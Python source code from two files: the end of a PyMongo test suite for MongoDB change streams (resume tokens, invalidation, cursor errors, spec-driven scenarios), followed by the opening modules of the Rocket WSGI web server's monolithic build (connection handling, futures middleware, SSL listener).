self._test_raises_error_on_missing_id(InvalidOperation)
# Prose test no. 3
def test_resume_on_error(self):
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
self.kill_change_stream_cursor(change_stream)
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 5
def test_does_not_resume_fatal_errors(self):
"""ChangeStream will not attempt to resume fatal server errors."""
for code in _NON_RESUMABLE_GETMORE_ERRORS:
with self.change_stream() as change_stream:
self.watched_collection().insert_one({})
def mock_try_next(*args, **kwargs):
change_stream._cursor.close()
raise OperationFailure('Mock server error', code=code)
original_try_next = change_stream._cursor._try_next
change_stream._cursor._try_next = mock_try_next
with self.assertRaises(OperationFailure):
next(change_stream)
change_stream._cursor._try_next = original_try_next
with self.assertRaises(StopIteration):
next(change_stream)
# Prose test no. 7
def test_initial_empty_batch(self):
with self.change_stream() as change_stream:
# The first batch should be empty.
self.assertFalse(change_stream._cursor._has_next())
cursor_id = change_stream._cursor.cursor_id
self.assertTrue(cursor_id)
self.insert_one_and_check(change_stream, {})
# Make sure we're still using the same cursor.
self.assertEqual(cursor_id, change_stream._cursor.cursor_id)
# Prose test no. 8
def test_kill_cursors(self):
def raise_error():
raise ServerSelectionTimeoutError('mock error')
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
self.kill_change_stream_cursor(change_stream)
cursor.close = raise_error
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 9
@client_context.require_version_min(4, 0, 0)
@client_context.require_version_max(4, 0, 7)
def test_start_at_operation_time_caching(self):
# Case 1: change stream not started with startAtOperationTime
client, listener = self.client_with_listener("aggregate")
with self.change_stream_with_client(client) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertIsNotNone(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"))
# Case 2: change stream started with startAtOperationTime
listener.results.clear()
optime = self.get_start_at_operation_time()
with self.change_stream_with_client(
client, start_at_operation_time=optime) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertEqual(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"), optime, str([k.command for k in
listener.results['started']]))
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_empty_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self.assertIsNone(change_stream.try_next())
resume_token = change_stream.resume_token
response = listener.results['succeeded'][0].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_exhausted_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self._populate_and_exhaust_change_stream(change_stream)
resume_token = change_stream.resume_token
response = listener.results['succeeded'][-1].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_empty_batch_legacy(self):
resume_point = self.get_resume_token()
# Empty resume token when neither resumeAfter or startAfter specified.
with self.change_stream() as change_stream:
change_stream.try_next()
self.assertIsNone(change_stream.resume_token)
# Resume token value is same as resumeAfter.
with self.change_stream(resume_after=resume_point) as change_stream:
change_stream.try_next()
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_exhausted_batch_legacy(self):
# Resume token is _id of last change.
with self.change_stream() as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
resume_point = change['_id']
# Resume token is _id of last change even if resumeAfter is specified.
with self.change_stream(resume_after=resume_point) as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
# Prose test no. 13
def test_resumetoken_partially_iterated_batch(self):
# When batch has been iterated up to but not including the last element.
# Resume token should be _id of previous change document.
with self.change_stream() as change_stream:
self.watched_collection(
write_concern=WriteConcern('majority')).insert_many(
[{"data": k} for k in range(3)])
for _ in range(2):
change = next(change_stream)
resume_token = change_stream.resume_token
self.assertEqual(resume_token, change["_id"])
def _test_resumetoken_uniterated_nonempty_batch(self, resume_option):
# When the batch is not empty and hasn't been iterated at all.
# Resume token should be same as the resume option used.
resume_point = self.get_resume_token()
# Insert some documents so that firstBatch isn't empty.
self.watched_collection(
write_concern=WriteConcern("majority")).insert_many(
[{'a': 1}, {'b': 2}, {'c': 3}])
# Resume token should be same as the resume option.
with self.change_stream(
**{resume_option: resume_point}) as change_stream:
self.assertTrue(change_stream._cursor._has_next())
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 14
@client_context.require_no_mongos
def test_resumetoken_uniterated_nonempty_batch_resumeafter(self):
self._test_resumetoken_uniterated_nonempty_batch("resume_after")
# Prose test no. 14
@client_context.require_no_mongos
@client_context.require_version_min(4, 1, 1)
def test_resumetoken_uniterated_nonempty_batch_startafter(self):
self._test_resumetoken_uniterated_nonempty_batch("start_after")
# Prose test no. 17
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_startafter_after_empty_getMore(self):
# Resume should use startAfter after no changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
change_stream.try_next() # No changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
# Prose test no. 18
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_resumeafter_after_nonempty_getMore(self):
# Resume should use resumeAfter after some changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
self.watched_collection().insert_one({})
next(change_stream) # Changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
class TestClusterChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestClusterChangeStream, cls).setUpClass()
cls.dbs = [cls.db, cls.client.pymongo_test_2]
@classmethod
def tearDownClass(cls):
for db in cls.dbs:
cls.client.drop_database(db)
super(TestClusterChangeStream, cls).tearDownClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client.watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
self.skipTest("cluster-level change streams cannot be invalidated")
def _test_get_invalidate_event(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _test_invalidate_stops_iteration(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _insert_and_check(self, change_stream, db, collname, doc):
coll = db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
db = random.choice(self.dbs)
collname = self.id()
self._insert_and_check(change_stream, db, collname, doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for db, collname in product(self.dbs, collnames):
self._insert_and_check(
change_stream, db, collname, {'_id': collname}
)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.client.admin.aggregate(
[{'$changeStream': {'allChangesForCluster': True}}],
maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({'allChangesForCluster': True})
class TestDatabaseChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestDatabaseChangeStream, cls).setUpClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the database invalidates the change stream.
change_stream._client.drop_database(self.db.name)
def _test_get_invalidate_event(self, change_stream):
# Cache collection names.
dropped_colls = self.db.list_collection_names()
# Drop the watched database to get an invalidate event.
self.generate_invalidate_event(change_stream)
change = change_stream.next()
# 4.1+ returns "drop" events for each collection in dropped database
# and a "dropDatabase" event for the database itself.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
for _ in range(len(dropped_colls)):
ns = change['ns']
self.assertEqual(ns['db'], change_stream._target.name)
self.assertIn(ns['coll'], dropped_colls)
change = change_stream.next()
self.assertEqual(change['operationType'], 'dropDatabase')
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {'db': change_stream._target.name})
# Get next change.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def _test_invalidate_stops_iteration(self, change_stream):
# Drop the watched database to get an invalidate event.
change_stream._client.drop_database(self.db.name)
# Check drop and dropDatabase events.
for change in change_stream:
self.assertIn(change['operationType'], (
'drop', 'dropDatabase', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _insert_and_check(self, change_stream, collname, doc):
coll = self.db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
self._insert_and_check(change_stream, self.id(), doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for collname in collnames:
self._insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()})
def test_isolation(self):
# Ensure inserts to other dbs don't show up in our ChangeStream.
other_db = self.client.pymongo_test_temp
self.assertNotEqual(
other_db, self.db, msg="Isolation must be tested on separate DBs")
collname = self.id()
with self.change_stream() as change_stream:
other_db[collname].insert_one({'_id': uuid.uuid4()})
self._insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()})
self.client.drop_database(other_db)
class TestCollectionChangeStream(TestChangeStreamBase, APITestsMixin,
ProseSpecTestsMixin):
@classmethod
@client_context.require_version_min(3, 5, 11)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestCollectionChangeStream, cls).setUpClass()
def setUp(self):
# Use a new collection for each test.
self.watched_collection().drop()
self.watched_collection().insert_one({})
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].get_collection(
self.watched_collection().name).watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the collection invalidates the change stream.
change_stream._target.drop()
def _test_invalidate_stops_iteration(self, change_stream):
self.generate_invalidate_event(change_stream)
# Check drop and dropDatabase events.
for change in change_stream:
self.assertIn(change['operationType'], ('drop', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _test_get_invalidate_event(self, change_stream):
# Drop the watched database to get an invalidate event.
change_stream._target.drop()
change = change_stream.next()
# 4.1+ returns a "drop" change document.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {
'db': change_stream._target.database.name,
'coll': change_stream._target.name})
# Last change should be invalidate.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def insert_one_and_check(self, change_stream, doc):
self.watched_collection().insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns'], {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name})
self.assertEqual(change['fullDocument'], doc)
def test_raw(self):
"""Test with RawBSONDocument."""
raw_coll = self.watched_collection(
codec_options=DEFAULT_RAW_BSON_OPTIONS)
with raw_coll.watch() as change_stream:
raw_doc = RawBSONDocument(encode({'_id': 1}))
self.watched_collection().insert_one(raw_doc)
change = next(change_stream)
self.assertIsInstance(change, RawBSONDocument)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns']['db'], self.watched_collection().database.name)
self.assertEqual(
change['ns']['coll'], self.watched_collection().name)
self.assertEqual(change['fullDocument'], raw_doc)
def test_uuid_representations(self):
"""Test with uuid document _ids and different uuid_representation."""
for uuid_representation in ALL_UUID_REPRESENTATIONS:
for id_subtype in (STANDARD, PYTHON_LEGACY):
options = self.watched_collection().codec_options.with_options(
uuid_representation=uuid_representation)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(
{'_id': Binary(uuid.uuid4().bytes, id_subtype)})
_ = change_stream.next()
resume_token = change_stream.resume_token
# Should not error.
coll.watch(resume_after=resume_token)
def test_document_id_order(self):
"""Test with document _ids that need their order preserved."""
random_keys = random.sample(string.ascii_letters,
len(string.ascii_letters))
random_doc = {'_id': SON([(key, key) for key in random_keys])}
for document_class in (dict, SON, RawBSONDocument):
options = self.watched_collection().codec_options.with_options(
document_class=document_class)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(random_doc)
_ = change_stream.next()
resume_token = change_stream.resume_token
# The resume token is always a document.
self.assertIsInstance(resume_token, document_class)
# Should not error.
coll.watch(resume_after=resume_token)
coll.delete_many({})
def test_read_concern(self):
"""Test readConcern is not validated by the driver."""
# Read concern 'local' is not allowed for $changeStream.
coll = self.watched_collection(read_concern=ReadConcern('local'))
with self.assertRaises(OperationFailure):
coll.watch()
# Does not error.
coll = self.watched_collection(read_concern=ReadConcern('majority'))
with coll.watch():
pass
class TestAllScenarios(unittest.TestCase):
@classmethod
@client_context.require_connection
def setUpClass(cls):
cls.listener = WhiteListEventListener("aggregate")
cls.client = rs_or_single_client(event_listeners=[cls.listener])
@classmethod
def tearDownClass(cls):
cls.client.close()
def setUp(self):
self.listener.results.clear()
def setUpCluster(self, scenario_dict):
assets = [
(scenario_dict["database_name"], scenario_dict["collection_name"]),
(scenario_dict["database2_name"], scenario_dict["collection2_name"]),
]
for db, coll in assets:
self.client.drop_database(db)
self.client[db].create_collection(coll)
def tearDown(self):
self.listener.results.clear()
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'change_streams'
)
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
snake = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camel)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', snake).lower()
def get_change_stream(client, scenario_def, test):
# Get target namespace on which to instantiate change stream
target = test["target"]
if target == "collection":
db = client.get_database(scenario_def["database_name"])
cs_target = db.get_collection(scenario_def["collection_name"])
elif target == "database":
cs_target = client.get_database(scenario_def["database_name"])
elif target == "client":
cs_target = client
else:
raise ValueError("Invalid target in spec")
# Construct change stream kwargs dict
cs_pipeline = test["changeStreamPipeline"]
options = test["changeStreamOptions"]
cs_options = {}
for key, value in iteritems(options):
cs_options[camel_to_snake(key)] = value
# Create and return change stream
return cs_target.watch(pipeline=cs_pipeline, **cs_options)
def run_operation(client, operation):
# Apply specified operations
opname = camel_to_snake(operation["name"])
arguments = operation.get("arguments", {})
if opname == 'rename':
# Special case for rename operation.
arguments = {'new_name': arguments["to"]}
cmd = getattr(client.get_database(
operation["database"]).get_collection(
operation["collection"]), opname
)
return cmd(**arguments)
def assert_dict_is_subset(superdict, subdict):
"""Check that subdict is a subset of superdict."""
exempt_fields = ["documentKey", "_id"]
for key, value in iteritems(subdict):
if key not in superdict:
assert False
if isinstance(value, dict):
assert_dict_is_subset(superdict[key], value)
continue
if key in exempt_fields:
superdict[key] = "42"
assert superdict[key] == value
def check_event(event, expectation_dict):
if event is None:
raise AssertionError
for key, value in iteritems(expectation_dict):
if isinstance(value, dict):
assert_dict_is_subset(
getattr(event, key), value
)
else:
assert getattr(event, key) == value
def create_test(scenario_def, test):
def run_scenario(self):
# Set up
self.setUpCluster(scenario_def)
is_error = test["result"].get("error", False)
try:
with get_change_stream(
self.client, scenario_def, test
) as change_stream:
for operation in test["operations"]:
# Run specified operations
run_operation(self.client, operation)
num_expected_changes = len(test["result"].get("success", []))
changes = [
change_stream.next() for _ in range(num_expected_changes)]
# Run a next() to induce an error if one is expected and
# there are no changes.
if is_error and not changes:
change_stream.next()
except OperationFailure as exc:
if not is_error:
raise
expected_code = test["result"]["error"]["code"]
self.assertEqual(exc.code, expected_code)
else:
# Check for expected output from change streams
for change, expected_changes in zip(changes, test["result"]["success"]):
assert_dict_is_subset(change, expected_changes)
self.assertEqual(len(changes), len(test["result"]["success"]))
finally:
# Check for expected events
results = self.listener.results
for expectation in test.get("expectations", []):
for idx, (event_type, event_desc) in enumerate(iteritems(expectation)):
results_key = event_type.split("_")[1]
event = results[results_key][idx] if len(results[results_key]) > idx else None
check_event(event, event_desc)
return run_scenario
def create_tests():
for dirpath, _, filenames in os.walk(_TEST_PATH):
dirname = os.path.split(dirpath)[-1]
for filename in filenames:
with open(os.path.join(dirpath, filename)) as scenario_stream:
scenario_def = json_util.loads(scenario_stream.read())
test_type = os.path.splitext(filename)[0]
for test in scenario_def['tests']:
new_test = create_test(scenario_def, test)
new_test = client_context.require_no_mmap(new_test)
if 'minServerVersion' in test:
min_ver = tuple(
int(elt) for
elt in test['minServerVersion'].split('.'))
new_test = client_context.require_version_min(*min_ver)(
new_test)
if 'maxServerVersion' in test:
max_ver = tuple(
int(elt) for
elt in test['maxServerVersion'].split('.'))
new_test = client_context.require_version_max(*max_ver)(
new_test)
topologies = test['topology']
new_test = client_context.require_cluster_type(topologies)(
new_test)
test_name = 'test_%s_%s_%s' % (
dirname,
test_type.replace("-", "_"),
str(test['description'].replace(" ", "_")))
new_test.__name__ = test_name
setattr(TestAllScenarios, new_test.__name__, new_test)
create_tests()
if __name__ == '__main__':
unittest.main()
|
rocket.py
|
# -*- coding: utf-8 -*-
# This file is part of the Rocket Web Server
# Copyright (c) 2011 Timothy Farrell
# Import System Modules
import sys
import errno
import socket
import logging
import platform
import traceback
# Define Constants
VERSION = '1.2.4'
SERVER_NAME = socket.gethostname()
SERVER_SOFTWARE = 'Rocket %s' % VERSION
HTTP_SERVER_SOFTWARE = '%s Python/%s' % (SERVER_SOFTWARE, sys.version.split(' ')[0])
BUF_SIZE = 16384
SOCKET_TIMEOUT = 1 # in secs
THREAD_STOP_CHECK_INTERVAL = 1 # in secs, How often should threads check for a server stop message?
IS_JYTHON = platform.system() == 'Java' # Handle special cases for Jython
IGNORE_ERRORS_ON_CLOSE = set([errno.ECONNABORTED, errno.ECONNRESET])
DEFAULT_LISTEN_QUEUE_SIZE = 5
DEFAULT_MIN_THREADS = 10
DEFAULT_MAX_THREADS = 0
DEFAULTS = dict(LISTEN_QUEUE_SIZE = DEFAULT_LISTEN_QUEUE_SIZE,
MIN_THREADS = DEFAULT_MIN_THREADS,
MAX_THREADS = DEFAULT_MAX_THREADS)
PY3K = sys.version_info[0] > 2
class NullHandler(logging.Handler):
"A Logging handler to prevent library errors."
def emit(self, record):
pass
if PY3K:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, bytes):
return val.decode(encoding)
else:
return val
else:
def b(val):
""" Convert string/unicode/bytes literals into bytes. This allows for
the same code to run on Python 2.x and 3.x. """
if isinstance(val, unicode):
return val.encode()
else:
return val
def u(val, encoding="us-ascii"):
""" Convert bytes into string/unicode. This allows for the
same code to run on Python 2.x and 3.x. """
if isinstance(val, str):
return val.decode(encoding)
else:
return val
# Import Package Modules
# package imports removed in monolithic build
__all__ = ['VERSION', 'SERVER_SOFTWARE', 'HTTP_SERVER_SOFTWARE', 'BUF_SIZE',
'IS_JYTHON', 'IGNORE_ERRORS_ON_CLOSE', 'DEFAULTS', 'PY3K', 'b', 'u',
'Rocket', 'CherryPyWSGIServer', 'SERVER_NAME', 'NullHandler']
# Monolithic build...end of module: rocket\__init__.py
# Monolithic build...start of module: rocket\connection.py
# Import System Modules
import sys
import time
import socket
try:
import ssl
has_ssl = True
except ImportError:
has_ssl = False
# Import Package Modules
# package imports removed in monolithic build
# TODO - This part is still very experimental.
#from .filelike import FileLikeSocket
class Connection(object):
__slots__ = [
'setblocking',
'sendall',
'shutdown',
'makefile',
'fileno',
'client_addr',
'client_port',
'server_port',
'socket',
'start_time',
'ssl',
'secure',
'recv',
'send',
'read',
'write'
]
def __init__(self, sock_tuple, port, secure=False):
self.client_addr, self.client_port = sock_tuple[1]
self.server_port = port
self.socket = sock_tuple[0]
self.start_time = time.time()
self.ssl = has_ssl and isinstance(self.socket, ssl.SSLSocket)
self.secure = secure
if IS_JYTHON:
# In Jython we must set TCP_NODELAY here since it does not
# inherit from the listening socket.
# See: http://bugs.jython.org/issue1309
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(SOCKET_TIMEOUT)
self.sendall = self.socket.sendall
self.shutdown = self.socket.shutdown
self.fileno = self.socket.fileno
self.setblocking = self.socket.setblocking
self.recv = self.socket.recv
self.send = self.socket.send
self.makefile = self.socket.makefile
# FIXME - this is not ready for prime-time yet.
# def makefile(self, buf_size=BUF_SIZE):
# return FileLikeSocket(self, buf_size)
def close(self):
if hasattr(self.socket, '_sock'):
try:
self.socket._sock.close()
except socket.error:
info = sys.exc_info()
if info[1].args[0] != socket.EBADF:
raise info[1]
else:
pass
self.socket.close()
# Monolithic build...end of module: rocket\connection.py
# Monolithic build...start of module: rocket\filelike.py
# Import System Modules
import socket
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# Import Package Modules
# package imports removed in monolithic build
class FileLikeSocket(object):
def __init__(self, conn, buf_size=BUF_SIZE):
self.conn = conn
self.buf_size = buf_size
self.buffer = StringIO()
self.content_length = None
if self.conn.socket.gettimeout() == 0.0:
self.read = self.non_blocking_read
else:
self.read = self.blocking_read
def __iter__(self):
return self
def recv(self, size):
while True:
try:
return self.conn.recv(size)
except socket.error:
exc = sys.exc_info()
e = exc[1]
# FIXME - Don't raise socket_errors_nonblocking or socket_error_eintr
if (e.args[0] not in set()):
raise
def next(self):
data = self.readline()
if data == '':
raise StopIteration
return data
def non_blocking_read(self, size=None):
# Shamelessly adapted from Cherrypy!
bufr = self.buffer
bufr.seek(0, 2)
if size is None:
while True:
data = self.recv(self.buf_size)
if not data:
break
bufr.write(data)
self.buffer = StringIO()
return bufr.getvalue()
else:
buf_len = self.buffer.tell()
if buf_len >= size:
bufr.seek(0)
data = bufr.read(size)
self.buffer = StringIO(bufr.read())
return data
self.buffer = StringIO()
while True:
remaining = size - buf_len
data = self.recv(remaining)
if not data:
break
n = len(data)
if n == size and not buf_len:
return data
if n == remaining:
bufr.write(data)
del data
break
bufr.write(data)
buf_len += n
del data
return bufr.getvalue()
def blocking_read(self, length=None):
if length is None:
if self.content_length is not None:
length = self.content_length
else:
length = 1
try:
data = self.conn.recv(length)
except:
data = b('')
return data
def readline(self):
data = b("")
char = self.read(1)
while char != b('\n') and char is not b(''):
line = repr(char)
data += char
char = self.read(1)
data += char
return data
def readlines(self, hint="ignored"):
return list(self)
def close(self):
self.conn = None
self.content_length = None
# Monolithic build...end of module: rocket\filelike.py
# Monolithic build...start of module: rocket\futures.py
# Import System Modules
import time
try:
from concurrent.futures import Future, ThreadPoolExecutor
from concurrent.futures.thread import _WorkItem
has_futures = True
except ImportError:
has_futures = False
class Future:
pass
class ThreadPoolExecutor:
pass
class _WorkItem:
pass
class WSGIFuture(Future):
def __init__(self, f_dict, *args, **kwargs):
Future.__init__(self, *args, **kwargs)
self.timeout = None
self._mem_dict = f_dict
self._lifespan = 30
self._name = None
self._start_time = time.time()
def set_running_or_notify_cancel(self):
if time.time() - self._start_time >= self._lifespan:
self.cancel()
else:
return super(WSGIFuture, self).set_running_or_notify_cancel()
def remember(self, name, lifespan=None):
self._lifespan = lifespan or self._lifespan
if name in self._mem_dict:
raise NameError('Cannot remember future by name "%s". ' % name + \
'A future already exists with that name.' )
self._name = name
self._mem_dict[name] = self
return self
def forget(self):
if self._name in self._mem_dict and self._mem_dict[self._name] is self:
del self._mem_dict[self._name]
self._name = None
class _WorkItem(object):
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class WSGIExecutor(ThreadPoolExecutor):
multithread = True
multiprocess = False
def __init__(self, *args, **kwargs):
ThreadPoolExecutor.__init__(self, *args, **kwargs)
self.futures = dict()
def submit(self, fn, *args, **kwargs):
if self._shutdown_lock.acquire():
if self._shutdown:
self._shutdown_lock.release()
raise RuntimeError('Cannot schedule new futures after shutdown')
f = WSGIFuture(self.futures)
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._shutdown_lock.release()
return f
else:
return False
class FuturesMiddleware(object):
"Futures middleware that adds a Futures Executor to the environment"
def __init__(self, app, threads=5):
self.app = app
self.executor = WSGIExecutor(threads)
def __call__(self, environ, start_response):
environ["wsgiorg.executor"] = self.executor
environ["wsgiorg.futures"] = self.executor.futures
return self.app(environ, start_response)
# Monolithic build...end of module: rocket\futures.py
# Monolithic build...start of module: rocket\listener.py
# Import System Modules
import os
import socket
import logging
import traceback
from threading import Thread
try:
import ssl
from ssl import SSLError
has_ssl = True
except ImportError:
has_ssl = False
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
class Listener(Thread):
"""The Listener class is a class responsible for accepting connections
and queuing them to be processed by a worker thread."""
def __init__(self, interface, queue_size, active_queue, *args, **kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance variables
self.active_queue = active_queue
self.interface = interface
self.addr = interface[0]
self.port = interface[1]
self.secure = len(interface) >= 4
self.clientcert_req = (len(interface) == 5 and interface[4])
self.thread = None
self.ready = False
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.Port%i' % self.port)
self.err_log.addHandler(NullHandler())
# Build the socket
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not listener:
self.err_log.error("Failed to get socket.")
return
if self.secure:
if not has_ssl:
self.err_log.error("ssl module required to serve HTTPS.")
return
elif not os.path.exists(interface[2]):
data = (interface[2], interface[0], interface[1])
self.err_log.error("Cannot find key file "
"'%s'. Cannot bind to %s:%s" % data)
return
elif not os.path.exists(interface[3]):
data = (interface[3], interface[0], interface[1])
self.err_log.error("Cannot find certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
if self.clientcert_req and not os.path.exists(interface[4]):
data = (interface[4], interface[0], interface[1])
self.err_log.error("Cannot find root ca certificate file "
"'%s'. Cannot bind to %s:%s" % data)
return
# Set socket options
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except:
msg = "Cannot share socket. Using %s:%i exclusively."
self.err_log.warning(msg % (self.addr, self.port))
try:
if not IS_JYTHON:
listener.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY,
1)
except:
msg = "Cannot set TCP_NODELAY, things might run a little slower"
self.err_log.warning(msg)
try:
listener.bind((self.addr, self.port))
except:
msg = "Socket %s:%i in use by other process and it won't share."
self.err_log.error(msg % (self.addr, self.port))
else:
# We want socket operations to timeout periodically so we can
# check if the server is shutting down
listener.settimeout(THREAD_STOP_CHECK_INTERVAL)
# Listen for new connections allowing queue_size number of
# connections to wait before rejecting a connection.
listener.listen(queue_size)
self.listener = listener
self.ready = True
def wrap_socket(self, sock):
try:
if self.clientcert_req:
ca_certs = self.interface[4]
cert_reqs = ssl.CERT_OPTIONAL
sock = ssl.wrap_socket(sock,
keyfile = self.interface[2],
certfile = self.interface[3],
server_side = True,
cert_reqs = cert_reqs,
ca_certs = ca_certs,
ssl_version = ssl.PROTOCOL_SSLv23)
else:
sock = ssl.wrap_socket(sock,
keyfile = self.interface[2],
certfile = self.interface[3],
server_side = True,
ssl_version = ssl.PROTOCOL_SSLv23)
except SSLError:
# Generally this happens when an HTTP request is received on a
# secure socket. We don't do anything because it will be detected
# by Worker and dealt with appropriately.
# self.err_log.error('SSL Error: %s' % traceback.format_exc())
pass
return sock
def start(self):
if not self.ready:
self.err_log.warning('Listener started when not ready.')
return
if self.thread is not None and self.thread.isAlive():
self.err_log.warning('Listener already running.')
return
self.thread = Thread(target=self.listen, name="Port" + str(self.port))
self.thread.start()
def isAlive(self):
if self.thread is None:
return False
return self.thread.isAlive()
def join(self):
if self.thread is None:
return
self.ready = False
